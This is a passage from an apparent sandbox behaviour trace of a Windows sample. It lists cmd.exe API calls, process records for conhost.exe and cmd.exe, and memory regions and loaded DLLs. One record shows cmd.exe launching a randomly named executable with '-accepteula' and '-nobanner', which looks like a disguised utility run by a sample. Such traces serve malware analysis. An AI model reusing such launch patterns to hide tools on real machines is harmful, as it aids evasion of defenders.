lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f658*=0x2) returned 1 [0301.441] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0301.441] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0301.441] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0301.441] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0301.441] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0301.441] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0301.441] GetConsoleTitleW (in: lpConsoleTitle=0x85f1d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0301.488] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0301.488] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0301.488] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0301.488] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0301.488] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0301.488] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0301.488] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.488] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.488] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x85ef90, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x85ef88, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x85ef88*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0301.488] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0301.488] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x85ed34 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0301.489] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0x85ed34, lpFilePart=0x85ed2c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0x85ed2c*=0x0) returned 0x1e [0301.489] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0301.489] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x85eab0 | out: lpFindFileData=0x85eab0) returned 0xb0cd58 [0301.489] FindClose (in: hFindFile=0xb0cd58 | out: hFindFile=0xb0cd58) returned 1 [0301.489] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x85eab0 | out: lpFindFileData=0x85eab0) returned 0xb0cd58 [0301.489] FindClose (in: hFindFile=0xb0cd58 | out: hFindFile=0xb0cd58) returned 1 [0301.489] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0301.489] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x85eab0 | out: lpFindFileData=0x85eab0) returned 0xb0cd58 [0301.489] FindClose (in: hFindFile=0xb0cd58 | out: hFindFile=0xb0cd58) returned 1 [0301.489] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0301.489] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0301.489] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0301.489] GetEnvironmentStringsW () returned 0xb0b4e0* [0301.489] FreeEnvironmentStringsA (penv="=") returned 1 [0301.489] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0301.489] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.489] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0301.762] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.762] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0301.809] _get_osfhandle (_FileHandle=0) returned 0x38 [0301.809] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0301.823] SetConsoleInputExeNameW () returned 0x1 [0301.823] GetConsoleOutputCP () Thread: id = 958 os_tid = 0xdd8 Process: id = "127" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7a5ff000" os_pid = "0xb00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "126" os_parent_pid = "0x6e0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8987 start_va = 0x7fa84000 end_va = 0x7fa84fff entry_point = 0x0 region_type = private name = "private_0x000000007fa84000" filename = "" Region: id = 8988 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8989 start_va = 0xfeac220000 end_va = 0xfeac23ffff entry_point = 0x0 region_type = private name = "private_0x000000feac220000" filename = "" Region: id = 8990 start_va = 0xfeac240000 end_va = 0xfeac253fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feac240000" filename = "" Region: id = 8991 start_va = 0xfeac260000 end_va = 0xfeac29ffff entry_point = 0x0 region_type = private name = "private_0x000000feac260000" filename = "" Region: id = 8992 start_va = 0x7df5ffbd0000 end_va = 0x7ff5ffbcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffbd0000" filename = "" Region: id = 8993 start_va = 0x7ff7fcea0000 end_va = 0x7ff7fcec2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fcea0000" filename = "" Region: id = 8994 start_va = 0x7ff7fcecd000 end_va = 0x7ff7fcecefff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcecd000" filename = "" Region: id = 8995 start_va = 0x7ff7fcecf000 end_va = 0x7ff7fcecffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcecf000" filename = "" Region: id = 8996 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 8997 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8998 start_va = 0xfeac220000 end_va = 0xfeac22ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feac220000" filename = "" Region: id = 8999 start_va = 0xfeac2a0000 end_va = 0xfeac35dfff entry_point = 0xfeac2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9000 start_va = 0xfeac3c0000 end_va = 0xfeac4bffff entry_point = 0x0 region_type = private name = "private_0x000000feac3c0000" filename = "" Region: id = 9001 start_va = 0x7ff7fcda0000 end_va = 0x7ff7fce9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fcda0000" filename = "" Region: id = 9002 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9003 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9004 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9005 start_va = 0xfeac360000 end_va = 0xfeac39ffff entry_point = 0x0 region_type = private name = "private_0x000000feac360000" filename = "" Region: id = 9006 start_va = 0xfeac4c0000 end_va = 0xfeac5dffff entry_point = 0x0 region_type = private name = "private_0x000000feac4c0000" filename = "" Region: id = 9007 start_va = 0x7ff7fcecb000 end_va = 0x7ff7fceccfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcecb000" filename = "" Region: id = 9008 start_va = 0xfeac230000 end_va = 0xfeac236fff entry_point = 0x0 region_type = private name = "private_0x000000feac230000" filename = "" Region: id = 9009 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 9010 start_va = 0xfeac3a0000 end_va = 0xfeac3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feac3a0000" filename = "" Region: id = 9011 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 9012 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9013 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9014 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9015 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 9016 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9017 start_va = 0xfeac3b0000 end_va = 0xfeac3b6fff entry_point = 0x0 region_type = private name = "private_0x000000feac3b0000" filename = "" Region: id = 9018 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9019 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9020 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 9021 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9022 start_va = 0xfeac5e0000 end_va = 0xfeac767fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feac5e0000" filename = "" Region: id = 9023 start_va = 0xfeac770000 end_va = 0xfeac8f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feac770000" filename = "" Region: id = 9024 start_va = 0xfeac900000 end_va = 0xfeadcfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feac900000" filename = "" Region: id = 9025 start_va = 0xfeac4c0000 end_va = 0xfeac4c0fff entry_point = 0x0 region_type = private name = "private_0x000000feac4c0000" filename = "" Region: id = 9026 start_va = 0xfeac4d0000 end_va = 0xfeac4d0fff entry_point = 0x0 region_type = private name = "private_0x000000feac4d0000" filename = "" Region: id = 9027 start_va = 0xfeac5d0000 end_va = 0xfeac5dffff entry_point = 0x0 region_type = private name = "private_0x000000feac5d0000" filename = "" Region: id = 9028 start_va = 0xfeadd00000 end_va = 0xfeadedffff entry_point = 0x0 region_type = private name = "private_0x000000feadd00000" filename = "" Region: id = 9029 start_va = 0xfeac4e0000 end_va = 0xfeac51ffff entry_point = 0x0 region_type = private name = "private_0x000000feac4e0000" filename = "" Region: id = 9030 start_va = 0x7ff7fcec9000 end_va = 0x7ff7fcecafff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcec9000" filename = "" Region: id = 9031 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 9032 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 9033 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9034 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 9035 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 9036 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 9037 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 9038 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 9039 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 9040 start_va = 0xfeac520000 end_va = 0xfeac59ffff entry_point = 0x0 region_type = private name = "private_0x000000feac520000" filename = "" Region: id = 9078 start_va = 0xfeadee0000 end_va = 0xfeae216fff entry_point = 0xfeadee0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 9079 start_va = 0xfeac260000 end_va = 0xfeac280fff entry_point = 0xfeac260000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 9080 start_va = 0xfeac520000 end_va = 0xfeac578fff entry_point = 0xfeac520000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 9081 start_va = 0xfeac590000 end_va = 0xfeac59ffff entry_point = 0x0 region_type = private name = "private_0x000000feac590000" filename = "" Region: id = 9082 start_va = 0xfeae220000 end_va = 0xfeae431fff entry_point = 0x0 region_type = private name = "private_0x000000feae220000" filename = "" Region: id = 9083 start_va = 0xfeae440000 end_va = 0xfeae650fff entry_point = 0x0 region_type = private name = "private_0x000000feae440000" filename = "" Region: id = 9084 start_va = 0xfeadd00000 end_va = 0xfeade0ffff entry_point = 0x0 region_type = private name = "private_0x000000feadd00000" filename = "" Region: id = 9085 start_va = 0xfeaded0000 end_va = 0xfeadedffff entry_point = 0x0 region_type = private name = "private_0x000000feaded0000" filename = "" Region: id = 9086 start_va = 0xfeae660000 end_va = 0xfeae870fff entry_point = 0x0 region_type = private name = "private_0x000000feae660000" filename = "" Region: id = 9087 start_va = 0xfeae880000 end_va = 0xfeae98ffff entry_point = 0x0 region_type = private name = "private_0x000000feae880000" filename = "" Region: id = 9089 start_va = 0xfeac260000 end_va = 0xfeac29ffff entry_point = 0x0 region_type = private name = "private_0x000000feac260000" filename = "" Region: id = 9090 start_va = 0xfeac520000 end_va = 0xfeac520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feac520000" filename = "" Region: id = 9091 start_va = 0x7ff7fcecd000 end_va = 0x7ff7fcecefff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcecd000" filename = "" Region: id = 9092 start_va = 0xfeade10000 end_va = 0xfeadec7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feade10000" filename = "" Region: id = 9093 start_va = 0xfeac520000 end_va = 0xfeac523fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feac520000" filename = "" Region: id = 9094 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 9095 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 9096 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 9097 start_va = 0xfeac530000 end_va = 0xfeac536fff entry_point = 0x0 region_type = private name = "private_0x000000feac530000" filename = "" Region: id = 9098 start_va = 0xfeac540000 end_va = 0xfeac544fff entry_point = 0xfeac540000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 9099 start_va = 0xfeac550000 end_va = 0xfeac550fff entry_point = 0xfeac550000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 9100 start_va = 0xfeac560000 end_va = 0xfeac561fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feac560000" filename = "" Region: id = 9101 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 9102 start_va = 0xfeac570000 end_va = 0xfeac570fff entry_point = 0xfeac570000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 9103 start_va = 0xfeac580000 end_va = 0xfeac581fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feac580000" filename = "" Region: id = 9104 start_va = 0xfeac570000 end_va = 0xfeac570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000feac570000" filename = "" Thread: id = 952 os_tid = 0x684 Thread: id = 953 os_tid = 0xdd4 Thread: id = 954 os_tid = 0xf94 Thread: id = 957 os_tid = 0x6c0 Process: id = "128" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5c43e000" os_pid = "0x3f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "81" os_parent_pid = "0xec4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Workflow.Targets\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9041 start_va = 0xa20000 end_va = 0xa3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 9042 start_va = 0xa40000 end_va = 0xa41fff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 9043 start_va = 0xa50000 end_va = 0xa63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 9044 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 9045 start_va = 0xab0000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 9046 start_va = 0xbb0000 end_va = 0xbb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 9047 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9048 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 9049 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9050 start_va = 0x7fbf0000 end_va = 0x7fc12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fbf0000" filename = "" Region: id = 9051 start_va = 0x7fc17000 end_va = 0x7fc17fff entry_point = 0x0 region_type = private name = "private_0x000000007fc17000" filename = "" Region: id = 9052 start_va = 0x7fc1c000 end_va = 0x7fc1cfff entry_point = 0x0 region_type = private name = "private_0x000000007fc1c000" filename = "" Region: id = 9053 start_va = 0x7fc1d000 end_va = 0x7fc1ffff entry_point = 0x0 region_type = private name = "private_0x000000007fc1d000" filename = "" Region: id = 9054 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9055 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9056 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 9057 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9058 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9059 start_va = 0xbc0000 end_va = 0xbc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 9060 start_va = 0xbd0000 end_va = 0xbd1fff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 9061 start_va = 0xdb0000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 9062 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9063 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9064 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9065 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9066 start_va = 0xbe0000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 9067 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9068 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9069 start_va = 0xa20000 end_va = 0xa2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 9070 start_va = 0x7faf0000 end_va = 0x7fbeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007faf0000" filename = "" Region: id = 9072 start_va = 0xdc0000 end_va = 0xe7dfff entry_point = 0xdc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9073 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9074 start_va = 0xd10000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 9075 start_va = 0xd50000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 9076 start_va = 0xe80000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 9077 start_va = 0x7fc19000 end_va = 0x7fc1bfff entry_point = 0x0 region_type = private name = "private_0x000000007fc19000" filename = "" Region: id = 9088 start_va = 0xa30000 end_va = 0xa33fff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 9112 start_va = 0xa40000 end_va = 0xa43fff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 9134 start_va = 0xf80000 end_va = 0x12b6fff entry_point = 0xf80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" 